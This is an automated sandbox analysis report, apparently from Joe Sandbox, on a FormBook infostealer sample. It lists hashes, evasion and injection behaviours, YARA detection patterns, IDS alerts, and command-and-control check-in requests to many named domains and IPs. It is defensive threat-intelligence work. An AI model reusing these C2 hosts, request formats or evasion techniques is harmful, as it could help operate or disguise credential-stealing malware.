Analysis Report HOPEFUL.exe

Overview

General Information

Sample Name: HOPEFUL.exe
Analysis ID: 339365
MD5: 9c15af175868121cc014666189d52dae
SHA1: 3ba03f47a8762368538e47806353f55da43d46ac
SHA256: 7c8f873fc34661a785875f76a1f3b1aff6719e69d2a4ea5d2d94f849282b623a
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • HOPEFUL.exe (PID: 6744 cmdline: 'C:\Users\user\Desktop\HOPEFUL.exe' MD5: 9C15AF175868121CC014666189D52DAE)
    • AddInProcess32.exe (PID: 6548 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 4656 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 4240 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.AddInProcess32.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.AddInProcess32.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
5.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.AddInProcess32.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Malware Configuration Extractor: FormBook (configuration listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: HOPEFUL.exe | ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match | File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: HOPEFUL.exe | Joe Sandbox ML: detected
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: HOPEFUL.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: HOPEFUL.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: AddInProcess32.pdb | source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: cmmon32.pdb | source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL | source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: AddInProcess32.exe, cmmon32.exe
Source: Binary string: AddInProcess32.pdbpw | source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdb | source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\HOPEFUL.exe | Code function: 4x nop then jmp 0164F5EEh
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi (5 occurrences)
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi (5 occurrences)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: global traffic | HTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1; Host: www.the343radio.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1; Host: www.registeredagentfirm.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1; Host: www.tiendazoom.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View | IP Address: 34.98.99.30
Source: Joe Sandbox View | ASN Name: IHNETUS
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: unknown | DNS traffic detected: queries for: www.the343radio.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Wed, 13 Jan 2021 20:50:04 GMT; Server: Apache; Content-Length: 315; Connection: close; Content-Type: text/html; charset=iso-8859-1; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 0000000D.00000000.325706052.000000000F640000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.com/jqc/www.lhc965.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.bebywye.site
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.bebywye.site/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.bebywye.site/jqc/www.ip-freight.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.bebywye.siteReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.eaglesnestpropheticministry.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/www.internetmarkaching.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.eaglesnestpropheticministry.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.internetmarkaching.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.internetmarkaching.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.internetmarkaching.com/jqc/www.weddingmustgoon.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.internetmarkaching.comReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.ip-freight.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.ip-freight.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.ip-freight.com/jqc/www.toweroflifeinc.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.ip-freight.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.kenniscourtureconsignments.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/www.novergi.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.kenniscourtureconsignments.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lhc965.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.com/jqc/M
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.novergi.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.tiendazoom.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digital/jqc/www.theorangepearl.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.strahlenschutz.digitalReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.com/jqc/www.11sxsx.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.theorangepearl.comReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.com/jqc/www.eaglesnestpropheticministry.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.tiendazoom.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/www.kenniscourtureconsignments.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.topheadlinetowitness-today.infoReferer:
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com/jqc/
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.com/jqc/www.bebywye.site
          Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.weddingmustgoon.comReferer:
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
